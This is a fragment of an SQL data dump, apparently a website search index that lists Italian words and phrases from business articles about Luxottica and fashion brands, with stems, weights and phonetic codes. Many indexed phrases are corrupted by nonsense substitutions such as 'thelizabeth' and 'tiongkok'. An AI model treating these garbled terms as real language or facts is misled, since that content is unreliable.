o',0,1,1.3333,'S653',1,'en'),(31714,'serenità o di','serenità o di',0,1,1.4333,'S653',1,'en'),(31715,'service tutto','servic tutto',0,1,1.4333,'S6123',1,'en'),(31716,'service tutto e','servic tutto e',0,1,1.5,'S6123',1,'en'),(31717,'service un','servic un',0,1,1.3333,'S6125',1,'en'),(31718,'service un percorso','servic un percorso',0,1,1.6333,'S612516262',1,'en'),(31719,'servizio','servizio',0,0,0.5333,'S612',1,'en'),(31720,'servizio altrat','servizio altrat',0,1,1.5,'S6124363',1,'en'),(31721,'servizio altrat thelizabethsì','servizio altrat thelizabethsì',0,1,1.9667,'S612436342132',1,'en'),(31722,'servizio deve','servizio deve',0,1,1.4333,'S61231',1,'en'),(31723,'servizio deve limitarsi','servizio deve limitarsi',0,1,1.7667,'S6123145362',1,'en'),(31724,'sette','sett',0,0,0.3333,'S300',1,'en'),(31725,'sette otto','sett otto',0,1,1.3333,'S300',1,'en'),(31726,'sette otto anni','sett otto anni',0,1,1.5,'S350',1,'en'),(31727,'settore','settor',0,0,0.4667,'S360',1,'en'),(31728,'settore e','settor e',0,1,1.3,'S360',1,'en'),(31729,'settore e una','settor e una',0,1,1.4333,'S365',1,'en'),(31730,'sezione','sezion',0,0,0.4667,'S500',1,'en'),(31731,'sezione archivi','sezion archivi',0,1,1.5,'S5621',1,'en'),(31732,'sezione archivi spetta','sezion archivi spetta',0,1,1.7333,'S5621213',1,'en'),(31733,'sfida','sfida',0,0,0.3333,'S130',1,'en'),(31734,'sfida è','sfida è',0,1,1.2333,'S130',1,'en'),(31735,'sfida è quella','sfida è quella',0,1,1.4667,'S1324',1,'en'),(31736,'sfida più','sfida più',0,1,1.3,'S131',1,'en'),(31737,'sfida più rilevante','sfida più rilevante',0,1,1.6333,'S13164153',1,'en'),(31738,'sfide','sfide',0,0,0.3333,'S130',1,'en'),(31739,'sfide penso','sfide penso',0,1,1.3667,'S13152',1,'en'),(31740,'sfide penso gna','sfide penso gna',0,1,1.5,'S131525',1,'en'),(31741,'sforzi','sforzi',0,0,0.4,'S162',1,'en'),(31742,'sforzi doing','sforzi doing',0,1,1.4,'S162352',1,'en'),(31743,'sforzi doing questa','sforzi doing questa',0,1,1.6333,'S1623523',1,'en'),(31744,'sganciare','sganciar',0,0,0.6,'S526',1,'en'),(31745,'sganciare luxottica','sganciar luxottica',0,1,1.6333,'S5264232',1,'en'),(31746,'sganciare luxottica dal','sganciar luxottica dal',0,1,1.7667,'S526423234',1,'en'),(31747,'si debba','si debba',0,1,1.2667,'S310',1,'en'),(31748,'si debba seguire','si debba seguire',0,1,1.5333,'S3126',1,'en'),(31749,'si può','si può',0,1,1.2,'S100',1,'en'),(31750,'si può service','si può service',0,1,1.4667,'S12612',1,'en'),(31751,'si tratta','si tratta',0,1,1.3,'S363',1,'en'),(31752,'si tratta di','si tratta di',0,1,1.4,'S363',1,'en'),(31753,'sia','sia',0,0,0.2,'S000',2,'en'),(31754,'sia quella','sia quella',0,1,1.3333,'S400',1,'en'),(31755,'sia quella di','sia quella di',0,1,1.4333,'S430',1,'en'),(31756,'sia saturo','sia saturo',0,1,1.3333,'S360',1,'en'),(31757,'sia saturo e','sia saturo e',0,1,1.4,'S360',1,'en'),(31758,'siamo','siamo',0,0,0.3333,'S500',1,'en'),(31759,'siamo cresciuti','siamo cresciuti',0,1,1.5,'S52623',1,'en'),(31760,'siamo cresciuti delete','siamo cresciuti delete',0,1,1.7333,'S5262343',1,'en'),(31761,'siamo in','siamo in',0,1,1.2667,'S500',1,'en'),(31762,'siamo in fase','siamo in fase',0,1,1.4333,'S512',1,'en'),(31763,'sico','sico',0,0,0.2667,'S000',1,'en'),(31764,'sicuramente','sicurament',0,0,0.7333,'S653',1,'en'),(31765,'sicuramente la','sicurament la',0,1,1.4667,'S6534',1,'en'),(31766,'sicuramente la primother','sicurament la primother',0,1,1.8,'S653416536',1,'en'),(31767,'significa','significa',0,0,0.6,'S512',1,'en'),(31768,'significa gna','significa gna',0,1,1.4333,'S5125',1,'en'),(31769,'significa gna ci','significa gna ci',0,1,1.5333,'S51252',1,'en'),(31770,'significa parliamo','significa parliamo',0,1,1.6,'S5121645',1,'en'),(31771,'significa parliamo del','significa parliamo del',0,1,1.7333,'S512164534',1,'en'),(31772,'simply put','simpli put',0,1,1.3333,'S51413',1,'en'),(31773,'simply put documentamo','simpli put documentamo',0,1,1.7333,'S514132535',1,'en'),(31774,'single per','singl per',0,1,1.3333,'S52416',1,'en'),(31775,'single per gli','singl per gli',0,1,1.4667,'S5241624',1,'en'),(31776,'so se','so se',0,1,1.1667,'S000',1,'en'),(31777,'so se li','so se li',0,1,1.2667,'S400',1,'en'),(31778,'società','società',0,0,0.4667,'S300',1,'en'),(31779,'società delete','società delete',0,1,1.4667,'S343',1,'en'),(31780,'società delete lusso','società delete lusso',0,1,1.6667,'S34342',1,'en'),(31781,'società gna','società gna',0,1,1.3667,'S325',1,'en'),(31782,'società gna vogliamo','società gna vogliamo',0,1,1.6667,'S3251245',1,'en'),(31783,'sole hanno','sole hanno',0,1,1.3333,'S450',1,'en'),(31784,'sole hanno un','sole hanno un',0,1,1.4333,'S450',1,'en'),(31785,'soli','soli',0,0,0.2667,'S400',1,'en'),(31786,'soli e','soli e',0,1,1.2,'S400',1,'en'),(31787,'soli e air','soli e air',0,1,1.3333,'S460',1,'en'),(31788,'somewhat','somewhat',0,0,0.5333,'S530',1,'en'),(31789,'somewhat riconosce','somewhat riconosce',0,1,1.6,'S536252',1,'en'),(31790,'somewhat riconosce i','somewhat riconosce i',0,1,1.6667,'S536252',1,'en'),(31791,'sono ancora','sono ancora',0,1,1.3667,'S526',1,'en'),(31792,'sono ancora grandissimi','sono ancora grandissimi',0,1,1.7667,'S526265325',1,'en'),(31793,'sono oggi','sono oggi',0,1,1.3,'S520',1,'en'),(31794,'sono oggi all','sono oggi all',0,1,1.4333,'S524',1,'en'),(31795,'sono pertanto','sono pertanto',0,1,1.4333,'S516353',1,'en'),(31796,'sono pertanto vietate','sono pertanto vietate',0,1,1.7,'S51635313',1,'en'),(31797,'sono semplicità','sono semplicità',0,1,1.5,'S5251423',1,'en'),(31798,'sono semplicità velocità','sono semplicità velocità',0,1,1.8,'S52514231423',1,'en'),(31799,'sono usciti','sono usciti',0,1,1.3667,'S523',1,'en'),(31800,'sono usciti dal','sono usciti dal',0,1,1.5,'S5234',1,'en'),(31801,'sopra','sopra',0,0,0.3333,'S160',1,'en'),(31802,'sopra il','sopra il',0,1,1.2667,'S164',1,'en'),(31803,'sopra il 90','sopra il 90',0,1,1.3667,'S164',1,'en'),(31804,'sostiene','sostien',0,0,0.5333,'S350',1,'en'),(31805,'sostiene gna','sostien gna',0,1,1.4,'S3525',1,'en'),(31806,'sostiene gna le','sostien gna le',0,1,1.5,'S35254',1,'en'),(31807,'sottolineare','sottolinear',0,0,0.8,'S3456',1,'en'),(31808,'sottolineare è','sottolinear è',0,1,1.4667,'S3456',1,'en'),(31809,'sottolineare è che','sottolinear è che',0,1,1.6,'S34562',1,'en'),(31810,'spazi','spazi',0,0,0.3333,'S120',1,'en'),(31811,'spazi di','spazi di',0,1,1.2667,'S123',1,'en'),(31812,'spazi di crescita','spazi di crescita',0,1,1.5667,'S1232623',1,'en'),(31813,'speed c\'','speed c',0,1,1.2667,'S132',1,'en'),(31814,'speed c\' è','speed c è',0,1,1.3333,'S132',1,'en'),(31815,'sperimentarsi','sperimentarsi',0,0,0.8667,'S165362',1,'en'),(31816,'sperimentarsi in','sperimentarsi in',0,1,1.5333,'S1653625',1,'en'),(31817,'sperimentarsi in of','sperimentarsi in of',0,1,1.6333,'S16536251',1,'en'),(31818,'spetta','spetta',0,0,0.4,'S130',1,'en'),(31819,'spetta in','spetta in',0,1,1.3,'S135',1,'en'),(31820,'spetta in using','spetta in using',0,1,1.5,'S135252',1,'en'),(31821,'sport','sport',0,0,0.3333,'S163',3,'en'),(31822,'sport è','sport è',0,1,1.2333,'S163',1,'en'),(31823,'sport è stato','sport è stato',0,1,1.4333,'S16323',1,'en'),(31824,'sta','sta',0,0,0.2,'S300',1,'en'),(31825,'sta cambiando','sta cambiando',0,1,1.4333,'S325153',1,'en'),(31826,'sta cambiando e','sta cambiando e',0,1,1.5,'S325153',1,'en'),(31827,'sta in','sta in',0,1,1.2,'S350',1,'en'),(31828,'sta in prima','sta in prima',0,1,1.4,'S35165',1,'en'),(31829,'stata','stata',0,0,0.3333,'S300',1,'en'),(31830,'stata aver','stata aver',0,1,1.3333,'S316',1,'en'),(31831,'stata aver fatto','stata aver fatto',0,1,1.5333,'S31613',1,'en'),(31832,'stata dipinta','stata dipinta',0,1,1.4333,'S3153',1,'en'),(31833,'stata dipinta prima','stata dipinta prima',0,1,1.6333,'S3153165',1,'en'),(31834,'stato','stato',0,0,0.3333,'S300',1,'en'),(31835,'stato più','stato più',0,1,1.3,'S310',1,'en'),(31836,'stato più lento','stato più lento',0,1,1.5,'S31453',1,'en'),(31837,'stento','stento',0,0,0.4,'S353',1,'en'),(31838,'stento invece','stento invece',0,1,1.4333,'S353512',1,'en'),(31839,'stento invece a','stento invece a',0,1,1.5,'S353512',1,'en'),(31840,'stiamo','stiamo',0,0,0.4,'S350',1,'en'),(31841,'stiamo lanciando','stiamo lanciando',0,1,1.5333,'S3545253',1,'en'),(31842,'stiamo lanciando polo','stiamo lanciando polo',0,1,1.7,'S354525314',1,'en'),(31843,'stiamo puntando','stiamo puntando',0,1,1.5,'S3515353',1,'en'),(31844,'stiamo puntando a','stiamo puntando a',0,1,1.5667,'S3515353',1,'en'),(31845,'straordinarie','straordinari',0,0,0.8667,'S36356',1,'en'),(31846,'straordinarie perché','straordinari perché',0,1,1.6667,'S36356162',1,'en'),(31847,'straordinarie perché accanto','straordinari perché accanto',0,1,1.9333,'S3635616253',1,'en'),(31848,'stretto','stretto',0,0,0.4667,'S363',1,'en'),(31849,'stretto l\'','stretto l',0,1,1.3333,'S3634',1,'en'),(31850,'stretto l\' accordo','stretto l accordo',0,1,1.6,'S3634263',1,'en'),(31851,'struttura','struttura',0,0,0.6,'S3636',1,'en'),(31852,'struttura delle','struttura delle',0,1,1.5,'S363634',1,'en'),(31853,'struttura delle dogane','struttura delle dogane',0,1,1.7333,'S363634325',1,'en'),(31854,'struttura organizzativa','struttura organizzativa',0,1,1.7667,'S363625231',1,'en'),(31855,'struttura organizzativa veramente','struttura organizzativa veramente',0,1,2,'S363625231653',1,'en'),(31856,'su quali','su quali',0,1,1.2667,'S400',1,'en'),(31857,'su quali mercati','su quali mercati',0,1,1.5333,'S45623',1,'en'),(31858,'subito','subito',0,0,0.4,'S130',1,'en'),(31859,'subito mother','subito mother',0,1,1.4333,'S13536',1,'en'),(31860,'subito mother è','subito mother è',0,1,1.5,'S13536',1,'en'),(31861,'successivo','successivo',0,0,0.6667,'S100',1,'en'),(31862,'successivo è','successivo è',0,1,1.4,'S100',1,'en'),(31863,'successivo è comprare','successivo è comprare',0,1,1.7,'S12516',1,'en'),(31864,'sui','sui',0,0,0.2,'S000',1,'en'),(31865,'sui 130','sui 130',0,1,1.2333,'S000',1,'en'),(31866,'sui 130 milioni','sui 130 milioni',0,1,1.5,'S545',1,'en'),(31867,'sul','sul',0,0,0.2,'S400',2,'en'),(31868,'sul portafoglio','sul portafoglio',0,1,1.5,'S4163124',1,'en'),(31869,'sul portafoglio marchi','sul portafoglio marchi',0,1,1.7333,'S4163124562',1,'en'),(31870,'sull\'','sull',0,0,0.3333,'S400',1,'en'),(31871,'sull\' organizzazione','sull organizzazione',0,1,1.6667,'S462525',1,'en'),(31872,'sull\' organizzazione sul','sull organizzazione sul',0,1,1.8,'S46252524',1,'en'),(31873,'sulla diversificazione','sulla diversificazione',0,1,1.7333,'S43162125',1,'en'),(31874,'sulla diversificazione geografica','sulla diversificazione geografica',0,1,2,'S431621252612',1,'en'),(31875,'sulle informazioni','sull informazioni',0,1,1.6,'S4516525',1,'en'),(31876,'sulle informazioni fornite','sull informazioni fornite',0,1,1.8667,'S45165251653',1,'en'),(31877,'suo','suo',0,0,0.2,'S000',1,'en'),(31878,'suo dna','suo dna',0,1,1.2333,'S350',1,'en'),(31879,'suo dna legato','suo dna legato',0,1,1.4667,'S35423',1,'en'),(31880,'suo mestiere','suo mestiere',0,1,1.4,'S5236',1,'en'),(31881,'suo mestiere è','suo mestiere è',0,1,1.4667,'S5236',1,'en'),(31882,'supererà','supererà',0,0,0.5333,'S160',1,'en'),(31883,'supererà quest\'','supererà quest',0,1,1.5,'S1623',1,'en'),(31884,'supererà quest\' anno','supererà quest anno',0,1,1.6667,'S16235',1,'en'),(31885,'superiore','superior',0,0,0.6,'S160',1,'en'),(31886,'superiore \'s','superior s',0,1,1.4,'S162',1,'en'),(31887,'superiore \'s 10','superior s 10',0,1,1.5,'S162',1,'en'),(31888,'svitamin','svitamin',0,0,0.5333,'S135',1,'en'),(31889,'svitamin yrgio','svitamin yrgio',0,1,1.4667,'S13562',1,'en'),(31890,'svitamin yrgio tacchini','svitamin yrgio tacchini',0,1,1.7667,'S13562325',1,'en'),(31891,'tacchini','tacchini',0,0,0.5333,'T250',1,'en'),(31892,'tacchini possibile','tacchini possibile',0,1,1.6,'T251214',1,'en'),(31893,'tacchini possibile pensare','tacchini possibile pensare',0,1,1.8667,'T2512141526',1,'en'),(31894,'taglia','taglia',0,0,0.4,'T240',1,'en'),(31895,'taglia giusta','taglia giusta',0,1,1.4333,'T2423',1,'en'),(31896,'taglia giusta di','taglia giusta di',0,1,1.5333,'T2423',1,'en'),(31897,'tante','tant',0,0,0.3333,'T530',1,'en'),(31898,'tante opportunità','tant opportunità',0,1,1.5667,'T5316353',1,'en'),(31899,'tante opportunità nel','tant opportunità nel',0,1,1.7,'T531635354',1,'en'),(31900,'tasso','tasso',0,0,0.3333,'T200',1,'en'),(31901,'tasso di','tasso di',0,1,1.2667,'T230',1,'en'),(31902,'tasso di cambio','tasso di cambio',0,1,1.5,'T23251',1,'en'),(31903,'teatralità','teatralità',0,0,0.6667,'T643',1,'en'),(31904,'teatralità for','teatralità for',0,1,1.4667,'T64316',1,'en'),(31905,'teatralità for every','teatralità for every',0,1,1.6667,'T6431616',1,'en'),(31906,'termine','termin',0,0,0.4667,'T650',1,'en'),(31907,'termine su','termin su',0,1,1.3333,'T652',1,'en'),(31908,'termine su quali','termin su quali',0,1,1.5333,'T6524',1,'en'),(31909,'testa','testa',0,0,0.3333,'T230',1,'en'),(31910,'testa le','testa le',0,1,1.2667,'T234',1,'en'),(31911,'testa le linee','testa le linee',0,1,1.4667,'T2345',1,'en'),(31912,'the avremo','the avremo',0,1,1.3333,'T165',1,'en'),(31913,'the avremo a','the avremo a',0,1,1.4,'T165',1,'en'),(31914,'the licenze','the licenze',0,1,1.3667,'T4252',1,'en'),(31915,'the licenze chi','the licenze chi',0,1,1.5,'T4252',1,'en'),(31916,'the nation è','the nation è',0,1,1.4,'T535',1,'en'),(31917,'the opportunità','the opportunità',0,1,1.5,'T16353',1,'en'),(31918,'the opportunità ne','the opportunità ne',0,1,1.6,'T163535',1,'en'),(31919,'thelizabeth qualità','thelizabeth qualità',0,1,1.6333,'T4213243',1,'en'),(31920,'thelizabeth qualità rvitamin','thelizabeth qualità rvitamin',0,1,1.9333,'T42132436135',1,'en'),(31921,'thelizabeth riproduzionagouritorito','thelizabeth riproduzionagouritorito',0,1,2,'T421361632526363',1,'en'),(31922,'thelizabeth riproduzionagouritorito dagouritoritoi','thelizabeth riproduzionagouritorito dagouritoritoi',0,1,2,'T42136163252636326363',1,'en'),(31923,'thelizabethntrali','thelizabethntrali',0,0,1,'T42135364',1,'en'),(31924,'thelizabethntrali mother','thelizabethntrali mother',0,1,1.8,'T42135364536',1,'en'),(31925,'thelizabethntrali mother occorrerà','thelizabethntrali mother occorrerà',0,1,2,'T4213536453626',1,'en'),(31926,'thelizabethrvizio','thelizabethrvizio',0,0,1,'T4213612',1,'en'),(31927,'thelizabethrvizio at','thelizabethrvizio at',0,1,1.6667,'T42136123',1,'en'),(31928,'thelizabethrvizio at thelizabeth','thelizabethrvizio at thelizabeth',0,1,2,'T421361234213',1,'en'),(31929,'thelizabethsì','thelizabethsì',0,0,0.8667,'T42132',1,'en'),(31930,'thelizabethsì vivitamin','thelizabethsì vivitamin',0,1,1.7667,'T42132135',1,'en'),(31931,'thelizabethsì vivitamin ytata','thelizabethsì vivitamin ytata',0,1,1.9667,'T421321353',1,'en'),(31932,'thesonali','thesonali',0,0,0.6,'T254',1,'en'),(31933,'thesonali e','thesonali e',0,1,1.3667,'T254',1,'en'),(31934,'thesonali e o','thesonali e o',0,1,1.4333,'T254',1,'en'),(31935,'throughout','throughout',0,0,0.6667,'T623',3,'en'),(31936,'throughout portafoglio','throughout portafoglio',0,1,1.7333,'T623163124',1,'en'),(31937,'throughout portafoglio di','throughout portafoglio di',0,1,1.8333,'T6231631243',1,'en'),(31938,'ticket','ticket',0,0,0.4,'T230',1,'en'),(31939,'ticket grandi','ticket grandi',0,1,1.4333,'T232653',1,'en'),(31940,'ticket grandi investimenti','ticket grandi investimenti',0,1,1.8667,'T232653512353',1,'en'),(31941,'tiffany','tiffani',0,0,0.4667,'T150',1,'en'),(31942,'tiffany quali','tiffani quali',0,1,1.4333,'T1524',1,'en'),(31943,'tiffany quali marchi','tiffani quali marchi',0,1,1.6667,'T1524562',1,'en'),(31944,'tiongkok','tiongkok',0,0,0.5333,'T520',1,'en'),(31945,'tiongkok abbiamo','tiongkok abbiamo',0,1,1.5333,'T5215',1,'en'),(31946,'tiongkok abbiamo complessivamente','tiongkok abbiamo complessivamente',0,1,2,'T521525142153',1,'en'),(31947,'tiongkok è','tiongkok è',0,1,1.3333,'T520',1,'en'),(31948,'tiongkok è un','tiongkok è un',0,1,1.4333,'T525',1,'en'),(31949,'tiongkok più','tiongkok più',0,1,1.4,'T521',1,'en'),(31950,'tiongkok più vitiongkok','tiongkok più vitiongkok',0,1,1.7667,'T521352',1,'en'),(31951,'tiongkok ritorna','tiongkok ritorna',0,1,1.5333,'T526365',1,'en'),(31952,'tiongkok ritorna anche','tiongkok ritorna anche',0,1,1.7333,'T5263652',1,'en'),(31953,'tipo','tipo',0,0,0.2667,'T100',1,'en'),(31954,'tipo di','tipo di',0,1,1.2333,'T130',1,'en'),(31955,'tipo di negozi','tipo di negozi',0,1,1.4667,'T1352',1,'en'),(31956,'titolarità','titolarità',0,0,0.6667,'T463',1,'en'),(31957,'titolarità di','titolarità di',0,1,1.4333,'T463',1,'en'),(31958,'titolarità di rcs','titolarità di rcs',0,1,1.5667,'T46362',1,'en'),(31959,'to each','to each',0,1,1.2333,'T200',1,'en'),(31960,'to each 50','to each 50',0,1,1.3333,'T200',1,'en'),(31961,'to each questo','to each questo',0,1,1.4667,'T230',1,'en'),(31962,'to each ralph','to each ralph',0,1,1.4333,'T2641',1,'en'),(31963,'to luxottica','to luxottica',0,1,1.4,'T4232',1,'en'),(31964,'to luxottica intanto','to luxottica intanto',0,1,1.6667,'T42325353',1,'en'),(31965,'tra dieci','tra dieci',0,1,1.3,'T632',1,'en'),(31966,'tra dieci vent\'','tra dieci vent',0,1,1.5,'T632153',1,'en'),(31967,'traguardo','traguardo',0,0,0.6,'T6263',1,'en'),(31968,'traguardo dei','traguardo dei',0,1,1.4333,'T6263',1,'en'),(31969,'traguardo dei 5','traguardo dei 5',0,1,1.5,'T6263',1,'en'),(31970,'traguardo di','traguardo di',0,1,1.4,'T6263',1,'en'),(31971,'traguardo di questo','traguardo di questo',0,1,1.6333,'T626323',1,'en'),(31972,'tratta di','tratta di',0,1,1.3,'T630',1,'en'),(31973,'tratta di aziende','tratta di aziende',0,1,1.5667,'T63253',1,'en'),(31974,'travel esperienza','travel esperienza',0,1,1.5667,'T61421652',1,'en'),(31975,'travel esperienza con','travel esperienza con',0,1,1.7,'T614216525',1,'en'),(31976,'travel la','travel la',0,1,1.3,'T614',1,'en'),(31977,'travel la romania','travel la romania',0,1,1.5667,'T61465',1,'en'),(31978,'tre anni','tre anni',0,1,1.2667,'T650',1,'en'),(31979,'tre anni amministratore','tre anni amministratore',0,1,1.7667,'T6523636',1,'en'),(31980,'trovare','trovar',0,0,0.4667,'T616',1,'en'),(31981,'trovare means','trovar means',0,1,1.4333,'T61652',1,'en'),(31982,'trovare means gall','trovar means gall',0,1,1.6,'T616524',1,'en'),(31983,'turchia','turchia',0,0,0.4667,'T620',1,'en'),(31984,'turchia ha','turchia ha',0,1,1.3333,'T620',1,'en'),(31985,'turchia ha preannunciato','turchia ha preannunciato',0,1,1.8,'T6216523',1,'en'),(31986,'tutta','tutta',0,0,0.3333,'T000',1,'en'),(31987,'tutta la','tutta la',0,1,1.2667,'T400',1,'en'),(31988,'tutta la moda','tutta la moda',0,1,1.4333,'T453',1,'en'),(31989,'tutte','tutt',0,0,0.3333,'T000',3,'en'),(31990,'tutte le','tutt le',0,1,1.2667,'T400',1,'en'),(31991,'tutte le parti','tutt le parti',0,1,1.4667,'T4163',1,'en'),(31992,'tutto','tutto',0,0,0.3333,'T000',2,'en'),(31993,'tutto e','tutto e',0,1,1.2333,'T000',1,'en'),(31994,'tutto e subito','tutto e subito',0,1,1.4667,'T213',1,'en'),(31995,'u svitamin','u svitamin',0,1,1.3333,'U2135',1,'en'),(31996,'u svitamin yrgio','u svitamin yrgio',0,1,1.5333,'U213562',1,'en'),(31997,'ulteriore','ulterior',0,0,0.6,'U436',1,'en'),(31998,'ulteriore 20','ulterior 20',0,1,1.4,'U436',1,'en'),(31999,'ulteriore 20 della','ulterior 20 della',0,1,1.6,'U43634',1,'en'),(32000,'umiltà','umiltà',0,0,0.4,'U543',1,'en'),(32001,'umiltà l\'','umiltà l',0,1,1.3,'U5434',1,'en'),(32002,'umiltà l\' altra','umiltà l altra',0,1,1.5,'U543436',1,'en'),(32003,'un','un',0,0,0.1333,'U500',4,'en'),(32004,'un distrarsi','un distrarsi',0,1,1.4,'U532362',1,'en'),(32005,'un distrarsi qual','un distrarsi qual',0,1,1.5667,'U5323624',1,'en'),(32006,'un grande','un grande',0,1,1.3,'U52653',1,'en'),(32007,'un grande marchio','un grande marchio',0,1,1.5667,'U52653562',1,'en'),(32008,'un incubo','un incubo',0,1,1.3,'U521',1,'en'),(32009,'un incubo poi','un incubo poi',0,1,1.4333,'U521',1,'en'),(32010,'un mercato','un mercato',0,1,1.3333,'U5623',1,'en'),(32011,'un mercato molto','un mercato molto',0,1,1.5333,'U5623543',1,'en'),(32012,'un paradiso','un paradiso',0,1,1.3667,'U51632',1,'en'),(32013,'un paradiso dobbiamo','un paradiso dobbiamo',0,1,1.6667,'U51632315',1,'en'),(32014,'un percorso','un percorso',0,1,1.3667,'U516262',1,'en'),(32015,'un percorso nell\'','un percorso nell',0,1,1.5667,'U51626254',1,'en'),(32016,'un portafoglio','un portafoglio',0,1,1.4667,'U5163124',1,'en'),(32017,'un portafoglio marchi','un portafoglio marchi',0,1,1.7,'U5163124562',1,'en'),(32018,'un prezzo','un prezzo',0,1,1.3,'U5162',1,'en'),(32019,'un prezzo inferiore','un prezzo inferiore',0,1,1.6333,'U5162516',1,'en'),(32020,'un risultato','un risultato',0,1,1.4,'U56243',1,'en'),(32021,'un risultato deletela','un risultato deletela',0,1,1.7,'U56243434',1,'en'),(32022,'un traguardo','un traguardo',0,1,1.4,'U536263',1,'en'),(32023,'un traguardo di','un traguardo di',0,1,1.5,'U536263',1,'en'),(32024,'un ulteriore','un ulteriore',0,1,1.4,'U5436',1,'en'),(32025,'un ulteriore 20','un ulteriore 20',0,1,1.5,'U5436',1,'en'),(32026,'un valore','un valore',0,1,1.3,'U5146',1,'en'),(32027,'un valore aggiunto','un valore aggiunto',0,1,1.6,'U5146253',1,'en'),(32028,'un\'','un',0,0,0.2,'U500',1,'en'),(32029,'un\' offerta','un offerta',0,1,1.3667,'U5163',1,'en'),(32030,'un\' offerta pubblica','un offerta pubblica',0,1,1.6667,'U5163142',1,'en'),(32031,'una capacità','una capacità',0,1,1.4,'U52123',1,'en'),(32032,'una capacità di','una capacità di',0,1,1.5,'U52123',1,'en'),(32033,'una certa','una certa',0,1,1.3,'U5263',1,'en'),(32034,'una certa cautela','una certa cautela',0,1,1.5667,'U5263234',1,'en'),(32035,'una crescita','una crescita',0,1,1.4,'U52623',1,'en'),(32036,'una crescita superiore','una crescita superiore',0,1,1.7333,'U52623216',1,'en'),(32037,'una dimensione','una dimensione',0,1,1.4667,'U53525',1,'en'),(32038,'una dimensione rilevante','una dimensione rilevante',0,1,1.8,'U5352564153',1,'en'),(32039,'una nuova buona','una nuova buona',0,1,1.5,'U515',1,'en'),(32040,'una realtà','una realtà',0,1,1.3333,'U5643',1,'en'),(32041,'una realtà gna','una realtà gna',0,1,1.4667,'U564325',1,'en'),(32042,'una rete','una rete',0,1,1.2667,'U563',1,'en'),(32043,'una rete di','una rete di',0,1,1.3667,'U563',1,'en'),(32044,'una scala','una scala',0,1,1.3,'U524',1,'en'),(32045,'una scala in','una scala in',0,1,1.4,'U5245',1,'en'),(32046,'una struttura','una struttura',0,1,1.4333,'U523636',1,'en'),(32047,'una struttura organizzativa','una struttura organizzativa',0,1,1.9,'U52363625231',1,'en'),(32048,'una tiongkok','una tiongkok',0,1,1.4,'U5352',1,'en'),(32049,'una tiongkok più','una tiongkok più',0,1,1.5333,'U53521',1,'en'),(32050,'una verticalizzazione','una verticalizzazione',0,1,1.7,'U51632425',1,'en'),(32051,'una verticalizzazione importante','una verticalizzazione importante',0,1,2,'U5163242516353',1,'en'),(32052,'united nations grande','unit nations grande',0,1,1.7,'U535352653',1,'en'),(32053,'us puntauthored','us puntauthored',0,1,1.5,'U215363',1,'en'),(32054,'us puntauthored debolmyself','us puntauthored debolmyself',0,1,1.9,'U215363145241',1,'en'),(32055,'usa quasi','usa quasi',0,1,1.3,'U200',1,'en'),(32056,'usa quasi l\'','usa quasi l',0,1,1.4,'U240',1,'en'),(32057,'usciti','usciti',0,0,0.4,'U230',1,'en'),(32058,'usciti dal','usciti dal',0,1,1.3333,'U234',1,'en'),(32059,'usciti dal vostro','usciti dal vostro',0,1,1.5667,'U2341236',1,'en'),(32060,'using a','us a',0,1,1.2333,'U252',1,'en'),(32061,'using a esclusiva','us a esclusiva',0,1,1.5667,'U252421',1,'en'),(32062,'usustmy','usustmi',0,0,0.4667,'U235',1,'en'),(32063,'usustmy personal','usustmi personal',0,1,1.5333,'U23516254',1,'en'),(32064,'usustmy personal mentorsince','usustmi personal mentorsince',0,1,1.9333,'U23516254536252',1,'en'),(32065,'utilizzare','utilizzar',0,0,0.6667,'U3426',1,'en'),(32066,'utilizzare il','utilizzar il',0,1,1.4333,'U34264',1,'en'),(32067,'utilizzare il servizio','utilizzar il servizio',0,1,1.7333,'U342642612',1,'en'),(32068,'valore','valor',0,0,0.4,'V460',1,'en'),(32069,'valore aggiunto','valor aggiunto',0,1,1.5,'V46253',1,'en'),(32070,'valore aggiunto non','valor aggiunto non',0,1,1.6333,'V462535',1,'en'),(32071,'valori','valori',0,0,0.4,'V460',1,'en'),(32072,'valori del','valori del',0,1,1.3333,'V4634',1,'en'),(32073,'valori del gruppo','valori del gruppo',0,1,1.5667,'V4634261',1,'en'),(32074,'various oltre','variou oltre',0,1,1.4333,'V62436',1,'en'),(32075,'various oltre a','variou oltre a',0,1,1.5,'V62436',1,'en'),(32076,'vecchio','vecchio',0,0,0.4667,'V200',1,'en'),(32077,'vecchio abbiamo','vecchio abbiamo',0,1,1.5,'V215',1,'en'),(32078,'vecchio abbiamo tante','vecchio abbiamo tante',0,1,1.7,'V215353',1,'en'),(32079,'vecchio e','vecchio e',0,1,1.3,'V200',1,'en'),(32080,'vecchio e chief','vecchio e chief',0,1,1.5,'V210',1,'en'),(32081,'vedere','veder',0,0,0.4,'V360',1,'en'),(32082,'vedere oggi','veder oggi',0,1,1.3667,'V362',1,'en'),(32083,'vedere oggi in','veder oggi in',0,1,1.4667,'V3625',1,'en'),(32084,'veloci','veloci',0,0,0.4,'V420',1,'en'),(32085,'veloci penso','veloci penso',0,1,1.4,'V42152',1,'en'),(32086,'veloci penso che','veloci penso che',0,1,1.5333,'V42152',1,'en'),(32087,'velocità','velocità',0,0,0.5333,'V423',1,'en'),(32088,'velocità umiltà','velocità umiltà',0,1,1.5,'V423543',1,'en'),(32089,'velocità umiltà l\'','velocità umiltà l',0,1,1.6,'V4235434',1,'en'),(32090,'vendita','vendita',0,0,0.4667,'V530',1,'en'),(32091,'vendita gna','vendita gna',0,1,1.3667,'V5325',1,'en'),(32092,'vendita gna significa','vendita gna significa',0,1,1.7,'V53252512',1,'en'),(32093,'vent\'','vent',0,0,0.3333,'V530',1,'en'),(32094,'vent\' anni','vent anni',0,1,1.3333,'V535',1,'en'),(32095,'vent\' anni concerning','vent anni concerning',0,1,1.7,'V535252652',1,'en'),(32096,'veramente','verament',0,0,0.6,'V653',1,'en'),(32097,'veramente globale','verament globale',0,1,1.5667,'V6532414',1,'en'),(32098,'veramente globale avere','verament globale avere',0,1,1.7667,'V653241416',1,'en'),(32099,'verticalizzazione','verticalizzazion',0,0,1,'V632425',1,'en'),(32100,'verticalizzazione importante','verticalizzazion importante',0,1,1.9333,'V63242516353',1,'en'),(32101,'verticalizzazione importante e','verticalizzazion importante e',0,1,2,'V63242516353',1,'en'),(32102,'vietate','vietat',0,0,0.4667,'V300',1,'en'),(32103,'vietate la','vietat la',0,1,1.3333,'V340',1,'en'),(32104,'vietate la rivendita','vietat la rivendita',0,1,1.6667,'V346153',1,'en'),(32105,'visto','visto',0,0,0.3333,'V230',1,'en'),(32106,'visto il','visto il',0,1,1.2667,'V234',1,'en'),(32107,'visto il tipo','visto il 